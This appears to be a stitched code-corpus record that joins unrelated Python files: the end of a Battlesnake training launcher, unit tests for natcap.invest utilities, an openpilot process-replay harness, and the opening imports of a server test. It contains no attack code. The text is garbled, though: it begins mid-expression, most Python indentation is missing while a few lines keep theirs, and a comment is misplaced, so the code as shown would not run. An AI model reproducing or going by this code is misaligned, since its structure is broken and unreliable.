"PRODUCATION_SNAKE" in os.environ))
if "MULTI_SNAKE_TRAINING" in os.environ:
state.set_training(True)
state.set_initial_network(os.environ['SNAKE_NETWORK'])
state.set_save_folder(os.environ['SAVE_FOLDER'])
state.set_training_iterations(int(os.environ['ITERATIONS']))
app.run(host="0.0.0.0", port=port, debug=False)
    elif os.getenv("PRODUCATION_SNAKE", "true").lower() in ("1", "true", "yes"):
# Load all of the script files
        # bool() on a non-empty env string is always True, so parse the
        # flag explicitly instead
        is_training = os.getenv("TRAIN", "true").lower() in ("1", "true", "yes")
state.set_training(is_training)
state.enable_download_training_data(is_training)
print("This snake is Training? {}".format(is_training))
initial_network = os.getenv(
"SNAKE_NETWORK", "./best_snake/gen:6-fitness:37008")
state.set_initial_network(initial_network)
print("The snake is starting using {}".format(initial_network))
iterations = int(os.getenv("ITERATIONS", 25))
state.set_training_iterations(iterations)
print("Starting training at {} iterations".format(iterations))
state.set_save_folder(os.getenv('SAVE_FOLDER', './network'))
app.run(host="0.0.0.0", port=port, debug=False)
else:
# Start running the training script
print("Starting training network")
print("This testing script will fork the battlesnake binary multiple times and test it on your snake")
# logging.disabled = True
# app.logger.disabled = True
state.set_training(True)
if "TRAIN_SNAKE_NETWORK" in os.environ:
state.set_initial_network(os.environ["TRAIN_SNAKE_NETWORK"])
# app.run(host="0.0.0.0", port=port, debug=False)
kwargs = {'host': '0.0.0.0', 'port': port,
'threaded': True, 'use_reloader': False, 'debug': False}
flask_thread = threading.Thread(
target=app.run, daemon=True, kwargs=kwargs)
flask_thread.start()
command = "./battlesnake play --url http://localhost:8080 -g solo -v"
for _ in range(500):
counter = AtomicCounter()
trainers = []
for index in range(1):
thread = Trainer(index, command, counter, 150, False)
thread.start()
trainers.append(thread)
for thread in trainers:
thread.join()
state.evolve()
print("Training finished")
flask_thread.join()
|
test_utils.py | """Module for testing the natcap.invest.utils module."""
import codecs
import unittest
import os
import tempfile
import shutil
import logging
import threading
import warnings
import re
import glob
import textwrap
from pygeoprocessing.testing import scm
import pygeoprocessing.testing
from osgeo import gdal
class SuffixUtilsTests(unittest.TestCase):
"""Tests for natcap.invest.utils.make_suffix_string."""
def test_suffix_string(self):
"""Utils: test suffix_string."""
from natcap.invest import utils
args = {'foo': 'bar', 'file_suffix': 'suff'}
suffix = utils.make_suffix_string(args, 'file_suffix')
self.assertEqual(suffix, '_suff')
def test_suffix_string_underscore(self):
"""Utils: test suffix_string underscore."""
from natcap.invest import utils
args = {'foo': 'bar', 'file_suffix': '_suff'}
suffix = utils.make_suffix_string(args, 'file_suffix')
self.assertEqual(suffix, '_suff')
def test_suffix_string_empty(self):
"""Utils: test empty suffix_string."""
from natcap.invest import utils
args = {'foo': 'bar', 'file_suffix': ''}
suffix = utils.make_suffix_string(args, 'file_suffix')
self.assertEqual(suffix, '')
def test_suffix_string_no_entry(self):
"""Utils: test no suffix entry in args."""
from natcap.invest import utils
args = {'foo': 'bar'}
suffix = utils.make_suffix_string(args, 'file_suffix')
self.assertEqual(suffix, '')
class FileRegistryUtilsTests(unittest.TestCase):
"""Tests for natcap.invest.utils.file_registry."""
def test_build_file_registry(self):
"""Utils: test build_file_registry on simple case."""
from natcap.invest import utils
base_dict = {'foo': 'bar', 'baz': '/bart/bam.txt'}
file_registry = utils.build_file_registry([(base_dict, '')], '')
self.assertEqual(
FileRegistryUtilsTests._norm_dict(base_dict),
FileRegistryUtilsTests._norm_dict(file_registry))
def test_build_file_registry_suffix(self):
"""Utils: test build_file_registry on suffix."""
from natcap.invest import utils
base_dict = {'foo': 'bar', 'baz': '/bart/bam.txt'}
file_registry = utils.build_file_registry([
(base_dict, '')], '_suff')
expected_dict = {
'foo': 'bar_suff',
'baz': '/bart/bam_suff.txt'
}
self.assertEqual(
FileRegistryUtilsTests._norm_dict(expected_dict),
FileRegistryUtilsTests._norm_dict(file_registry))
def test_build_file_registry_list_suffix(self):
"""Utils: test build_file_registry on list of files w/ suffix."""
from natcap.invest import utils
base_dict = {
'foo': ['bar', '/bart/bam.txt']
}
file_registry = utils.build_file_registry([
(base_dict, '')], '_suff')
expected_dict = {
'foo': ['bar_suff', '/bart/bam_suff.txt']
}
self.assertEqual(
FileRegistryUtilsTests._norm_dict(expected_dict),
FileRegistryUtilsTests._norm_dict(file_registry))
def test_build_file_registry_path(self):
"""Utils: test build_file_registry on path."""
from natcap.invest import utils
base_dict = {
'foo': 'bar',
'baz': '/bart/bam.txt',
'jab': 'jim'
}
file_registry = utils.build_file_registry([
(base_dict, 'newpath')], '')
expected_dict = {
'foo': 'newpath/bar',
'jab': 'newpath/jim',
'baz': '/bart/bam.txt',
}
self.assertEqual(
FileRegistryUtilsTests._norm_dict(expected_dict),
FileRegistryUtilsTests._norm_dict(file_registry))
def test_build_file_registry_duppath(self):
"""Utils: test build_file_registry ValueError on duplicate paths."""
from natcap.invest import utils
base_dict = {
'foo': 'bar',
'jab': 'bar'
}
with self.assertRaises(ValueError):
_ = utils.build_file_registry([
(base_dict, 'newpath')], '')
def test_build_file_registry_dupkeys(self):
"""Utils: test build_file_registry ValueError on duplicate keys."""
from natcap.invest import utils
base_dict1 = {
'foo': 'bar',
}
base_dict2 = {
'foo': 'bar2',
}
with self.assertRaises(ValueError):
_ = utils.build_file_registry([
(base_dict1, ''), (base_dict2, '')], '')
def test_build_file_registry_invalid_value(self):
"""Utils: test build_file_registry with invalid path type."""
from natcap.invest import utils
base_dict = {
'foo': 'bar',
'baz': None
}
with self.assertRaises(ValueError):
_ = utils.build_file_registry([(base_dict, 'somepath')], '')
@staticmethod
def _norm_dict(path_dict):
"""Take a dictionary of paths and normalize the paths."""
result_dict = {}
for key, path in path_dict.items():
if isinstance(path, str):
result_dict[key] = os.path.normpath(path)
elif isinstance(path, list):
result_dict[key] = [
os.path.normpath(list_path) for list_path in path]
else:
                raise ValueError("Unexpected path value: %s" % path)
return result_dict
class ExponentialDecayUtilsTests(unittest.TestCase):
"""Tests for natcap.invest.utils.exponential_decay_kernel_raster."""
_REGRESSION_PATH = os.path.join(
os.path.dirname(__file__), '..', 'data', 'invest-test-data',
'exp_decay_kernel')
def setUp(self):
"""Setup workspace."""
self.workspace_dir = tempfile.mkdtemp()
def tearDown(self):
"""Delete workspace."""
shutil.rmtree(self.workspace_dir)
@scm.skip_if_data_missing(_REGRESSION_PATH)
def test_exp_decay_kernel_raster(self):
"""Utils: test exponential_decay_kernel_raster."""
from natcap.invest import utils
expected_distance = 100 # 10 pixels
kernel_filepath = os.path.join(self.workspace_dir, 'kernel_100.tif')
utils.exponential_decay_kernel_raster(
expected_distance, kernel_filepath)
pygeoprocessing.testing.assert_rasters_equal(
os.path.join(
ExponentialDecayUtilsTests._REGRESSION_PATH,
'kernel_100.tif'), kernel_filepath, abs_tol=1e-6)
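    # For reference, the kernel under test is expected to decay roughly as
    #   k(d) = exp(-d / expected_distance)
    # (the exact normalization and raster extent are assumptions here; the
    # test only compares against the stored regression raster above).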
class SandboxTempdirTests(unittest.TestCase):
def setUp(self):
"""Setup workspace."""
self.workspace_dir = tempfile.mkdtemp()
def tearDown(self):
"""Delete workspace."""
shutil.rmtree(self.workspace_dir)
def test_sandbox_manager(self):
from natcap.invest import utils
with utils.sandbox_tempdir(suffix='foo',
prefix='bar',
dir=self.workspace_dir) as new_dir:
self.assertTrue(new_dir.startswith(self.workspace_dir))
basename = os.path.basename(new_dir)
self.assertTrue(basename.startswith('bar'))
self.assertTrue(basename.endswith('foo'))
# trigger the exception handling for coverage.
shutil.rmtree(new_dir)
class TimeFormattingTests(unittest.TestCase):
def test_format_time_hours(self):
from natcap.invest.utils import _format_time
seconds = 3667
self.assertEqual(_format_time(seconds), '1h 1m 7s')
def test_format_time_minutes(self):
from natcap.invest.utils import _format_time
seconds = 67
self.assertEqual(_format_time(seconds), '1m 7s')
def test_format_time_seconds(self):
from natcap.invest.utils import _format_time
seconds = 7
self.assertEqual(_format_time(seconds), '7s')
class LogToFileTests(unittest.TestCase):
def setUp(self):
self.workspace = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.workspace)
def test_log_to_file_all_threads(self):
"""Utils: Verify that we can capture messages from all threads."""
from natcap.invest.utils import log_to_file
logfile = os.path.join(self.workspace, 'logfile.txt')
def _log_from_other_thread():
thread_logger = logging.getLogger()
thread_logger.info('this is from a thread')
local_logger = logging.getLogger()
# create the file before we log to it, so we know a warning should
# be logged.
with open(logfile, 'w') as new_file:
new_file.write(' ')
with log_to_file(logfile) as handler:
thread = threading.Thread(target=_log_from_other_thread)
thread.start()
local_logger.info('this should be logged')
local_logger.info('this should also be logged')
thread.join()
handler.flush()
with open(logfile) as opened_logfile:
            messages = [msg for msg in opened_logfile.read().split('\n')
                        if msg]
self.assertEqual(len(messages), 3)
def test_log_to_file_from_thread(self):
"""Utils: Verify that we can filter from a threading.Thread."""
from natcap.invest.utils import log_to_file
logfile = os.path.join(self.workspace, 'logfile.txt')
def _log_from_other_thread():
thread_logger = logging.getLogger()
thread_logger.info('this should not be logged')
thread_logger.info('neither should this message')
local_logger = logging.getLogger()
thread = threading.Thread(target=_log_from_other_thread)
with log_to_file(logfile, exclude_threads=[thread.name]) as handler:
thread.start()
local_logger.info('this should be logged')
thread.join()
handler.flush()
with open(logfile) as opened_logfile:
            messages = [msg for msg in opened_logfile.read().split('\n')
                        if msg]
self.assertEqual(len(messages), 1)
class ThreadFilterTests(unittest.TestCase):
def test_thread_filter_same_thread(self):
from natcap.invest.utils import ThreadFilter
# name, level, pathname, lineno, msg, args, exc_info, func=None
record = logging.LogRecord(
name='foo',
level=logging.INFO,
pathname=__file__,
lineno=500,
msg='some logging message',
args=(),
exc_info=None,
func='test_thread_filter_same_thread')
        filterer = ThreadFilter(threading.current_thread().name)
# The record comes from the same thread.
self.assertEqual(filterer.filter(record), False)
def test_thread_filter_different_thread(self):
from natcap.invest.utils import ThreadFilter
# name, level, pathname, lineno, msg, args, exc_info, func=None
record = logging.LogRecord(
name='foo',
level=logging.INFO,
pathname=__file__,
lineno=500,
msg='some logging message',
args=(),
exc_info=None,
func='test_thread_filter_same_thread')
filterer = ThreadFilter('Thread-nonexistent')
        # The record comes from a different thread, so it passes the filter.
self.assertEqual(filterer.filter(record), True)
class MakeDirectoryTests(unittest.TestCase):
"""Tests for natcap.invest.utils.make_directories."""
def setUp(self):
"""Make temporary directory for workspace."""
self.workspace_dir = tempfile.mkdtemp()
def tearDown(self):
"""Delete workspace."""
shutil.rmtree(self.workspace_dir)
def test_make_directories(self):
"""utils: test that make directories works as expected."""
from natcap.invest import utils
directory_list = [
os.path.join(self.workspace_dir, x) for x in [
'apple', 'apple/pie', 'foo/bar/baz']]
utils.make_directories(directory_list)
for path in directory_list:
self.assertTrue(os.path.isdir(path))
def test_make_directories_on_existing(self):
"""utils: test that no error if directory already exists."""
from natcap.invest import utils
path = os.path.join(self.workspace_dir, 'foo', 'bar', 'baz')
os.makedirs(path)
utils.make_directories([path])
self.assertTrue(os.path.isdir(path))
def test_make_directories_on_file(self):
"""utils: test that value error raised if file exists on directory."""
from natcap.invest import utils
dir_path = os.path.join(self.workspace_dir, 'foo', 'bar')
os.makedirs(dir_path)
file_path = os.path.join(dir_path, 'baz')
file = open(file_path, 'w')
file.close()
with self.assertRaises(OSError):
utils.make_directories([file_path])
def test_make_directories_wrong_type(self):
"""utils: test that ValueError raised if value not a list."""
from natcap.invest import utils
with self.assertRaises(ValueError):
utils.make_directories(self.workspace_dir)
class GDALWarningsLoggingTests(unittest.TestCase):
def setUp(self):
self.workspace = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.workspace)
def test_log_warnings(self):
"""utils: test that we can capture GDAL warnings to logging."""
from natcap.invest import utils
logfile = os.path.join(self.workspace, 'logfile.txt')
# this warning should go to stdout.
gdal.Open('this_file_should_not_exist.tif')
with utils.log_to_file(logfile) as handler:
with utils.capture_gdal_logging():
# warning should be captured.
gdal.Open('file_file_should_also_not_exist.tif')
handler.flush()
# warning should go to stdout
gdal.Open('this_file_should_not_exist.tif')
with open(logfile) as opened_logfile:
            messages = [msg for msg in opened_logfile.read().split('\n')
                        if msg]
self.assertEqual(len(messages), 1)
class PrepareWorkspaceTests(unittest.TestCase):
def setUp(self):
self.workspace = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.workspace)
def test_prepare_workspace(self):
"""utils: test that prepare_workspace does what is expected."""
from natcap.invest import utils
workspace = os.path.join(self.workspace, 'foo')
try:
with utils.prepare_workspace(workspace,
'some_model'):
warnings.warn('deprecated', UserWarning)
gdal.Open('file should not exist')
except Warning as warning_raised:
self.fail('Warning was not captured: %s' % warning_raised)
self.assertTrue(os.path.exists(workspace))
logfile_glob = glob.glob(os.path.join(workspace, '*.txt'))
self.assertEqual(len(logfile_glob), 1)
self.assertTrue(
os.path.basename(logfile_glob[0]).startswith('InVEST-some_model'))
with open(logfile_glob[0]) as logfile:
logfile_text = logfile.read()
# all the following strings should be in the logfile.
expected_string = 'file should not exist: No such file or directory'
self.assertTrue(expected_string in logfile_text) # gdal error captured
self.assertEqual(len(re.findall('WARNING', logfile_text)), 1)
self.assertTrue('Elapsed time:' in logfile_text)
class BuildLookupFromCSVTests(unittest.TestCase):
"""Tests for natcap.invest.utils.build_lookup_from_csv."""
def setUp(self):
"""Make temporary directory for workspace."""
self.workspace_dir = tempfile.mkdtemp()
def tearDown(self):
"""Delete workspace."""
shutil.rmtree(self.workspace_dir)
def test_build_lookup_from_csv(self):
"""utils: test build_lookup_from_csv."""
from natcap.invest import utils
table_str = 'a,b,foo,bar,_\n0.0,x,-1,bar,apple\n'
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(table_str)
result = utils.build_lookup_from_csv(
table_path, 'a', to_lower=True)
expected_dict = {
0.0: {
'a': 0.0,
'b': 'x',
'foo': -1.0,
'bar': 'bar',
'_': 'apple'
},
}
self.assertDictEqual(result, expected_dict)
def test_unique_key_not_first_column(self):
"""utils: test success when key field is not first column."""
from natcap.invest import utils
csv_text = ("desc,lucode,val1,val2\n"
"corn,1,0.5,2\n"
"bread,2,1,4\n"
"beans,3,0.5,4\n"
"butter,4,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
result = utils.build_lookup_from_csv(
table_path, 'lucode', to_lower=True)
expected_result = {
1: {'desc': 'corn', 'val1': 0.5, 'val2': 2, 'lucode': 1},
2: {'desc': 'bread', 'val1': 1, 'val2': 4, 'lucode': 2},
3: {'desc': 'beans', 'val1': 0.5, 'val2': 4, 'lucode': 3},
4: {'desc': 'butter', 'val1': 9, 'val2': 1, 'lucode': 4}}
self.assertDictEqual(result, expected_result)
def test_non_unique_keys(self):
"""utils: test error is raised if keys are not unique."""
from natcap.invest import utils
csv_text = ("lucode,desc,val1,val2\n"
"1,corn,0.5,2\n"
"2,bread,1,4\n"
"2,beans,0.5,4\n"
"4,butter,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
with self.assertRaises(ValueError):
utils.build_lookup_from_csv(table_path, 'lucode', to_lower=True)
def test_missing_key_field(self):
"""utils: test error is raised when missing key field."""
from natcap.invest import utils
csv_text = ("luode,desc,val1,val2\n"
"1,corn,0.5,2\n"
"2,bread,1,4\n"
"3,beans,0.5,4\n"
"4,butter,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
with self.assertRaises(KeyError):
utils.build_lookup_from_csv(table_path, 'lucode', to_lower=True)
def test_nan_holes(self):
"""utils: test empty strings returned when missing data is present."""
from natcap.invest import utils
csv_text = ("lucode,desc,val1,val2\n"
"1,corn,0.5,2\n"
"2,,1,4\n"
"3,beans,0.5,4\n"
"4,butter,,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
result = utils.build_lookup_from_csv(
table_path, 'lucode', to_lower=True)
expected_result = {
1: {'desc': 'corn', 'val1': 0.5, 'val2': 2, 'lucode': 1},
2: {'desc': '', 'val1': 1, 'val2': 4, 'lucode': 2},
3: {'desc': 'beans', 'val1': 0.5, 'val2': 4, 'lucode': 3},
4: {'desc': 'butter', 'val1': '', 'val2': 1, 'lucode': 4}}
self.assertDictEqual(result, expected_result)
def test_nan_row(self):
"""utils: test NaN row is dropped."""
from natcap.invest import utils
csv_text = ("lucode,desc,val1,val2\n"
"1,corn,0.5,2\n"
",,,\n"
"3,beans,0.5,4\n"
"4,butter,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
result = utils.build_lookup_from_csv(
table_path, 'lucode', to_lower=True)
expected_result = {
1.0: {'desc': 'corn', 'val1': 0.5, 'val2': 2, 'lucode': 1.0},
3.0: {'desc': 'beans', 'val1': 0.5, 'val2': 4, 'lucode': 3.0},
4.0: {'desc': 'butter', 'val1': 9, 'val2': 1, 'lucode': 4.0}}
self.assertDictEqual(result, expected_result)
def test_column_subset(self):
"""utils: test column subset is properly returned."""
from natcap.invest import utils
csv_text = ("lucode,desc,val1,val2\n"
"1,corn,0.5,2\n"
"2,bread,1,4\n"
"3,beans,0.5,4\n"
"4,butter,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
result = utils.build_lookup_from_csv(
table_path, 'lucode', to_lower=True, column_list=['val1', 'val2'])
expected_result = {
1: {'val1': 0.5, 'val2': 2, 'lucode': 1},
2: {'val1': 1, 'val2': 4, 'lucode': 2},
3: {'val1': 0.5, 'val2': 4, 'lucode': 3},
4: {'val1': 9, 'val2': 1, 'lucode': 4}}
self.assertDictEqual(result, expected_result)
def test_trailing_comma(self):
"""utils: test a trailing comma on first line is handled properly."""
from natcap.invest import utils
csv_text = ("lucode,desc,val1,val2\n"
"1,corn,0.5,2,\n"
"2,bread,1,4\n"
"3,beans,0.5,4\n"
"4,butter,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
result = utils.build_lookup_from_csv(
table_path, 'lucode', to_lower=True)
expected_result = {
1: {'desc': 'corn', 'val1': 0.5, 'val2': 2, 'lucode': 1},
2: {'desc': 'bread', 'val1': 1, 'val2': 4, 'lucode': 2},
3: {'desc': 'beans', 'val1': 0.5, 'val2': 4, 'lucode': 3},
4: {'desc': 'butter', 'val1': 9, 'val2': 1, 'lucode': 4}}
self.assertDictEqual(result, expected_result)
def test_trailing_comma_second_line(self):
"""utils: test a trailing comma on second line is handled properly."""
from natcap.invest import utils
csv_text = ("lucode,desc,val1,val2\n"
"1,corn,0.5,2\n"
"2,bread,1,4,\n"
"3,beans,0.5,4\n"
"4,butter,9,1")
table_path = os.path.join(self.workspace_dir, 'table.csv')
with open(table_path, 'w') as table_file:
table_file.write(csv_text)
result = utils.build_lookup_from_csv(
table_path, 'lucode', to_lower=True)
expected_result = {
1: {'desc': 'corn', 'val1': 0.5, 'val2': 2, 'lucode': 1},
2: {'desc': 'bread', 'val1': 1, 'val2': 4, 'lucode': 2},
3: {'desc': 'beans', 'val1': 0.5, 'val2': 4, 'lucode': 3},
4: {'desc': 'butter', 'val1': 9, 'val2': 1, 'lucode': 4}}
self.assertDictEqual(result, expected_result)
def test_results_lowercase_non_numeric(self):
"""utils: text handling of converting to lowercase."""
from natcap.invest import utils
csv_file = os.path.join(self.workspace_dir, 'csv.csv')
with open(csv_file, 'w') as file_obj:
file_obj.write(textwrap.dedent(
"""
header1,HEADER2,header3
1,2,bar
4,5,FOO
"""
).strip())
lookup_dict = utils.build_lookup_from_csv(
csv_file, 'header1', to_lower=True)
self.assertEqual(lookup_dict[4]['header3'], 'foo')
self.assertEqual(lookup_dict[1]['header2'], 2)
def test_results_uppercase_numeric_cast(self):
"""utils: test handling of uppercase, num. casting, blank values."""
from natcap.invest import utils
csv_file = os.path.join(self.workspace_dir, 'csv.csv')
with open(csv_file, 'w') as file_obj:
file_obj.write(textwrap.dedent(
"""
header1,HEADER2,header3,missing_column,
1,2,3,
4,FOO,bar,
"""
).strip())
lookup_dict = utils.build_lookup_from_csv(
csv_file, 'header1', to_lower=False)
self.assertEqual(lookup_dict[4]['HEADER2'], 'FOO')
self.assertEqual(lookup_dict[4]['header3'], 'bar')
self.assertEqual(lookup_dict[1]['header1'], 1)
def test_csv_dialect_detection_semicolon_delimited(self):
"""utils: test that we can parse semicolon-delimited CSVs."""
from natcap.invest import utils
csv_file = os.path.join(self.workspace_dir, 'csv.csv')
with open(csv_file, 'w') as file_obj:
file_obj.write(textwrap.dedent(
"""
header1;HEADER2;header3;
1;2;3;
4;FOO;bar;
"""
).strip())
lookup_dict = utils.build_lookup_from_csv(
csv_file, 'header1', to_lower=False)
self.assertEqual(lookup_dict[4]['HEADER2'], 'FOO')
self.assertEqual(lookup_dict[4]['header3'], 'bar')
self.assertEqual(lookup_dict[1]['header1'], 1)
def test_csv_utf8_bom_encoding(self):
"""utils: test that CSV read correctly with UTF-8 BOM encoding."""
from natcap.invest import utils
csv_file = os.path.join(self.workspace_dir, 'csv.csv')
# writing with utf-8-sig will prepend the BOM
with open(csv_file, 'w', encoding='utf-8-sig') as file_obj:
file_obj.write(textwrap.dedent(
"""
header1,HEADER2,header3
1,2,bar
4,5,FOO
"""
).strip())
# confirm that the file has the BOM prefix
with open(csv_file, 'rb') as file_obj:
self.assertTrue(file_obj.read().startswith(codecs.BOM_UTF8))
lookup_dict = utils.build_lookup_from_csv(
csv_file, 'header1')
# assert the BOM prefix was correctly parsed and skipped
self.assertEqual(lookup_dict[4]['header2'], 5)
self.assertEqual(lookup_dict[4]['header3'], 'foo')
self.assertEqual(lookup_dict[1]['header1'], 1)
def test_csv_latin_1_encoding(self):
"""utils: test that CSV read correctly with Latin-1 encoding."""
from natcap.invest import utils
csv_file = os.path.join(self.workspace_dir, 'csv.csv')
with codecs.open(csv_file, 'w', encoding='iso-8859-1') as file_obj:
file_obj.write(textwrap.dedent(
"""
header 1,HEADER 2,header 3
1,2,bar1
4,5,FOO
"""
).strip())
lookup_dict = utils.build_lookup_from_csv(
csv_file, 'header 1')
self.assertEqual(lookup_dict[4]['header 2'], 5)
self.assertEqual(lookup_dict[4]['header 3'], 'foo')
self.assertEqual(lookup_dict[1]['header 1'], 1)
|
process_replay.py | #!/usr/bin/env python3
import os
import threading
import importlib
import shutil
if "CI" in os.environ:
tqdm = lambda x: x
else:
from tqdm import tqdm
from cereal import car, log
from selfdrive.car.car_helpers import get_car
import selfdrive.manager as manager
import cereal.messaging as messaging
from common.params import Params
from cereal.services import service_list
from collections import namedtuple
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback'])
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
self.recv_ready.wait()
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
self.recv_called.wait()
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
self.recv_called.wait()
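# FakeSocket's two Event pairs implement a lockstep handshake: the process
# under replay blocks in receive() until the harness has staged data and set
# recv_ready, while send() waits on recv_called so exactly one message is
# consumed per recv; wait_for_recv() lets the harness detect that the
# process has started polling the socket.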
class DumbSocket:
def __init__(self, s=None):
if s is not None:
dat = messaging.new_message()
dat.init(s)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super(FakeSubMaster, self).__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
self.update_ready.wait()
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
self.update_ready.wait()
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
self.update_called.wait()
self.update_called.clear()
super(FakeSubMaster, self).update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
self.update_called.wait()
class FakePubMaster(messaging.PubMaster):
def __init__(self, services):
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
data = messaging.new_message()
try:
data.init(s)
      except Exception:
data.init(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
self.get_called.wait()
self.get_called.clear()
def wait_for_msg(self):
self.send_called.wait()
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
can_sock.recv_called.wait()
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['pathPlan'].sensorValid
fsm.update_called.wait()
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP):
if msg.which() != "can":
return []
elif CP.radarOffCan:
return ["radarState", "liveTracks"]
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"]
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"thermal": [], "health": [], "liveCalibration": [], "driverMonitoring": [], "plan": [], "pathPlan": [], "gpsLocation": [],
"model": [],
},
ignore=[("logMonoTime", 0), ("valid", True), ("controlsState.startMonoTime", 0), ("controlsState.cumLagMs", 0)],
init_callback=fingerprint,
should_recv_callback=None,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "controlsState": [], "model": [],
},
ignore=[("logMonoTime", 0), ("valid", True), ("radarState.cumLagMs", 0)],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"model": ["pathPlan"], "radarState": ["plan"],
"carState": [], "controlsState": [], "liveParameters": [],
},
ignore=[("logMonoTime", 0), ("valid", True), ("plan.processingDelay", 0)],
init_callback=get_car_params,
should_recv_callback=None,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"cameraOdometry": ["liveCalibration"]
},
ignore=[("logMonoTime", 0), ("valid", True)],
init_callback=get_car_params,
should_recv_callback=None,
),
]
def replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
shutil.rmtree('/data/params', ignore_errors=True)
params = Params()
params.manager_start()
params.put("OpenpilotEnabledToggle", "1")
params.put("Passive", "0")
params.put("CommunityFeaturesToggle", "1")
os.environ['NO_RADAR_SLEEP'] = "1"
manager.prepare_managed_process(cfg.proc_name)
mod = importlib.import_module(manager.managed_processes[cfg.proc_name])
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock)
CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs):
if cfg.should_recv_callback is not None:
recv_socks = cfg.should_recv_callback(msg, CP)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
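# Minimal usage sketch (the LogReader import path is an assumption based on
# the openpilot tools layout; adjust to your checkout):
#   from tools.lib.logreader import LogReader
#   log_msgs = replay_process(CONFIGS[0], LogReader("path/to/rlog.bz2"))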
|
test_run_server.py | import asyncio
import json
from live2p.start_live2p import start_live2p
import logging
